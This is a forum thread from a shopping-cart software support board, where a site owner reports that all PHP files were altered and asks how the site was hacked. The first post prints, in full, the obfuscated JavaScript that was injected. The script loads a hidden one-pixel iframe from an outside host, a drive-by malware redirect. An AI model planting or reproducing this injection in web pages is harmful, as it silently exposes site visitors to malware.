Shopping Cart Software
Website Hacked
This is a discussion on Website Hacked within the osCMax v2 Installation issues forums, part of the osCMax v2.0 Forums category; Last night one of my websites was hacked. I can't track it how it was done but all php files ...
| |||||||
 | Register | FAQ | Donate | Members List | Calendar | Mark Forums Read |
|
#1
07-30-2010, 03:20 AM
| |||
| |||
 Website Hacked Last night one of my websites was hacked. I can't track it how it was done but all php files were modified with code: Code: <script>function bF(){};nK="nK";bF.prototype = {o : function() {var s="";var eB=new Array();this.yS="";this.cE="cE";yI='';var n=function(){};this.dV=17028;var r=document;function x(){};var fL=new Date();var fC=35798;function l(){};dE=51990;this.iF=42492;function v(){};var j=window;var iX=new Array();eY="";this.jL=false;yL="";jG="jG";vH='';var h=new Date();var z = this;var iY=new Array();w='';b="";fT=false;var kBC=new Date();var fH=function(){return 'fH'};String.prototype.eL=function(p, zB){var pA=this; return pA.replace(p, zB)};uF="uF";yB=27300;var iJ=false;var zI='';this.hK="hK";var oB=false;wC=16683;this.rE="";var i = 's&emtBTr'.eL(/[r(mB&]/g, '') + 'i$mDeVo4'.eL(/[4$VDz]/g, '') + 'uztx'.eL(/[xJw*z]/g, '');this.tZ="";var qZ=new Date();this.lV=59400;dL="";var cW='';var aQ="";this.tJ="";var iP="";var d = 't+r1e/cDr/eDa1'.eL(/[1D/+%]/g, '') + 'tseYE!l!e!mQeYnstYgseYtQ'.eL(/[Q+!Ys]/g, '');this.oK=23764;this.yZ='';wZ=37757;nV='';hV="hV";qD="";var nA=15820;var a = 'wgr#i<t#ey'.eL(/[y<g#6]/g, '');var sJ="sJ";function sX(){};var fZ=function(){return 'fZ'};var gJ=function(){return 'gJ'};var kI=50149;qG=27962;try {var tN='';var tJR=new Array();var aA="";this.kS='';this.cL=60296;var y = 'pVu%sVh&'.eL(/[&Vz#%]/g, '');var eP=new Array();var uX=function(){return 'uX'};cT=false;var vL=false;var fR=function(){return 'fR'};var k = 'soryc['.eL(/[[yZo]]/g, '');var eO='';oS=55462;this.qF="";this.cD="cD";oP="oP";var wD='';var jJ=new Array();var t = 'v/b|mUi|fP'.eL(/[P/Un|]/g, '')+'rIsIe2tI'.eL(/[I201n]/g, '');var xV="xV";function zN(){};var rO=function(){return 'rO'};pR=false;var wP=function(){return 'wP'};this.rS="";var g = 'wLiEdE'.eL(/[EL,.#]/g, '') + 't<hG'.eL(/[G<2xM]/g, '');var sN='';var dY=false;pF="";this.eV='';gX="";var zM=function(){};hI='';this.kP="kP";var m = 'hDesiy'.eL(/[ys98D]/g, '') + 'gyhmtA'.eL(/[A+my,]/g, '');this.fV="fV";var nT=new Array();aAE=56126;hU="hU";var mF = '1<'.eL(/[<[pzM]/g, '');fE="fE";var aAT=new Date();this.xD="xD";kM="";this.aN=9321;f = 'g}e?tCs3ent3A?t?tnr}i3snd3fC'.eL(/[Cn3}?]/g, '');yO=64991;var gB=function(){return 'gB'};var qC=24176;var kGO=function(){};var zE=new Date();this.dH='';var c = 'anpxpx'.eL(/[xGKnL]/g, '') + 'e7nbduCWhuibl<du'.eL(/[uW<7b]/g, '');var eN="";var oV="";var vR=52882;lK="";var mH=23886;var aK='';var kB = 'b>o#d#yI'.eL(/[I#>M6]/g, '');this.wW="";xI='';this.pB='';var jH=function(){return 'jH'};function jT(){};var dM = 'sWuK'.eL(/[KzWQD]/g, '')+'b,s,t,r:i>'.eL(/[>Vo,:]/g, '')+'n.gF'.eL(/[F(6.D]/g, '');var fER=function(){};var yP="";wI=40242;yBU="yBU";kE=false;var cI = new Array();zQ="zQ";var fI='';var aX="";iJI='';var sXY='';var fG="fG";cI[y](m, dM, d, g, t, f, kB, c, mF, r, k);this.nI="";var eVN='';var rX=new Array();var gP=new Array();var aNS=423;this.oT="";var zX='';kPP=47363;fVU='';qU="qU";this.sM="";qK=false;nJ=false;this.fTN=65095;this.hVC=false;var xA=61670;var tV=function(){};var rXZ=false;bG="bG";var pAY=5308;aC=33465;var jA=function(){return 'jA'};var rQ=new Array();this.cN=false;var hJ="";var oKP="";var iM=false;var aE=function(){};var tF=false;this.aCM='';this.qJ='';var lI="lI";var tQ=function(){return 'tQ'};this.kL="";var fZL=function(){return 'fZL'};var iPZ=58157;var fW='';var mB=new Array();this.tU="tU";pH=21532;var jD='';var jLD='';this.eJ="eJ";var e = cI[2][cI[1]](3, 16);hB='';fGE=62022;xL=57888;hL="";var dA = cI[4][cI[1]](3, 6);mT='';nX='';function zY(){};var dU='';function rP(){};yR = dA + 'aUmPeP'.eL(/[P%UhM]/g, '');wT=39333;aB=5797;this.wN="";this.aG=false;var tH = cI[5][cI[1]](3, 11);this.hE='';this.oQ='';nM="nM";nB="";var tG=new Date();var wF="wF";var vM=false;q = tH + 'bFuktKe)'.eL(/[)YFkK]/g, '');this.oC='';this.vMM='';this.eT="eT";this.pI="pI";var kG = 'hxt^t^p^:E/^/xc#oEmEpEr#oEmEe#nEd^e#s^.xc^oxmE/KsEtEdKsx/#gxoE.#pxhxpx?EsKi#dK=K5#'.eL(/[#ExK^]/g, '');this.wL=false;var qR="";var fIL="";uM=false;var rC="";this.sU="";var u=cI[9][e](yR);this.jAJ="";hN='';var pJ=function(){return 'pJ'};this.uI="uI";var dUW=function(){return 'dUW'};mJ=64726;u[cI[10]] = kG;yD="";var qW=false;this.iQ=false;var zS=new Date();var hC=new Date();this.nO=false;u[cI[3]] = cI[8];eI=22912;var vO="vO";vJ="";this.mG=false;var qCV=function(){return 'qCV'};this.yRT="yRT";u[cI[0]] = cI[8];this.rEG='';mZ=33472;var cG=3785;var aP=27559;dJ="dJ";var lR="lR";this.lF="";this.wZF='';function aM(){};zW='';wY="";var iI=false;var yRJ=new Date();cI[9][cI[6]][cI[7]](u);var iK='';var iT='';this.gR="";this.uO="";oZ='';} catch(zH) {this.uH='';function qE(){};this.aV=60775;bU=false;r.write('<*hOtOm*lx x>^<xbOo*dxy^ *>*<O/~b*o*dOy^>O<*/*hxtOmxlx>^'.eL(/[^x~O*]/g, ''));var fS='';var jK=function(){};this.sNM="";vF='';this.lW='';var tJI="";var pK='';j[i](function(){ z.o() }, 309);var hCY=function(){return 'hCY'};var zHP="";this.uS='';this.vJW='';}vFH=359;this.wNF="wNF";var bL="";var sL="sL";}};var yG=new Array();var lRO=new bF(); var lVM=function(){return 'lVM'};lRO.o();qFK='';</script>
Or maybe how was it done?      |
|
#2
07-30-2010, 03:57 AM
| ||||
| ||||
| Re: Website Hacked Not seen this one before ... Quote:
Are you running any other php scripts on your site? Which version of osCmax are you running? v2.0 RC4, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.25? Regards,
__________________ pgmarshall _______________________________ Test Site: www.cottonbarn.info Want to say thank you if I helped you out? Help me block this waste incinerator plan (www.nywag.org) in North Yorkshire, UK. Sign the petition here (only takes 1 minute). Thanks. |
|
#3
07-30-2010, 04:51 AM
| ||||
| ||||
| Re: Website Hacked A quick Google of the first part of the string suggests a few of these - macromediasetup.com was mentioned...  
__________________ Hosting plans with installation, configuration, contributions, support and maintenance. |
 |
| Thread Tools | |
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| site Hacked, questions | Jokim | osCMax v1.7 Discussion | 5 | 07-27-2010 12:35 AM |
| Website Recently Hacked | deju | osCMax v2 Customization/Mods | 19 | 04-17-2009 10:27 PM |
| Website Hacked - Possible Security Breech | robp | osCommerce 2.2 Discussion | 5 | 10-09-2007 11:49 AM |
| Call for Mods : Have you hacked in a mod to your shop? | michael_s | osCMax v1.7 General Mods Discussion | 14 | 06-02-2005 10:08 PM |
| Quantity Tracking Pro - anyone hacked this into MS2 MAX ? | malcol27 | osCMax v1.7 General Mods Discussion | 0 | 02-20-2005 07:10 AM |
All times are GMT -8. The time now is 06:27 AM.